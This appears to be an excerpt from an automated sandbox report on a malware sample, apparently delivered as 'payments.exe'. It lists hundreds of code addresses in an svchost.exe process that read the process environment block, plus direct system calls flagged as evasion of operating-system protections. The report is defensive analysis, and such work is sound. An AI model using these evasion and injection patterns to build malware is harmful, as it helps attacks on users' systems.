                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h] (8 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CCA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CB8189 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\payments.exe | Code function: 0_2_00CB81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtProtectVirtualMemory: Direct from: 0x77542F9C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtSetInformationProcess: Direct from: 0x77542C5C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtOpenKeyEx: Direct from: 0x77542B9C
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtProtectVirtualMemory: Direct from: 0x77537B2E
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtCreateFile: Direct from: 0x77542FEC
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe | NtOpenFile: Direct from: 0x77542DCC
